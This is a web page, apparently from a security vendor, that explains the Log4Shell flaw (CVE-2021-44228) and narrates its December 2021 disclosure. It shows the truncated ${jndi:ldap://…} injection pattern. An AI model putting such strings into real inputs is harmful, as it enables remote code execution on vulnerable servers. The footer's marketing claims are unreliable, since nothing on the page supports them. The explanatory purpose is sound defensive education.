LIVE Intel Feed
← Attack Cinema
CVE-2021-44228CVSS 10.02021-12-09

Log4Shell

How one log line owned the internet.

A string like ${jndi:ldap://…} inside any value logged by Apache Log4j 2.x caused the JVM to fetch and execute code from an attacker-controlled LDAP server. Remote code execution. No authentication. Logging the string was enough.

1 / 10
T+0PUBLIC

Disclosure hits Twitter

December 9, 2021 — a researcher publishes a proof-of-concept showing that Minecraft chat messages can execute code on the server. Within an hour the scope expands: anything that logs user input via Log4j is vulnerable. Tomcat. Elasticsearch. Steam. iCloud. Tesla. You.

publishes PoCspreadsResearcherChen ZhaojunTwitter threadEvery Java shop on earth…and they don't know yet
Disclosure lands. The whole internet is suddenly a target list.
🔒 Quantum-Resistant Mycelium Architecture
🛡️ 3M+ Runbooks – täglich von SecOps-Experten geprüft
🌐 Zero Known Breaches – Powered by Living Intelligence
🏛️ SOC2 & ISO 27001 Aligned • GDPR 100 % compliant
⚡ Real-Time Global Mycelium Network – 347 Bedrohungen in 60 Minuten
🧬 Trusted by SecOps Leaders worldwide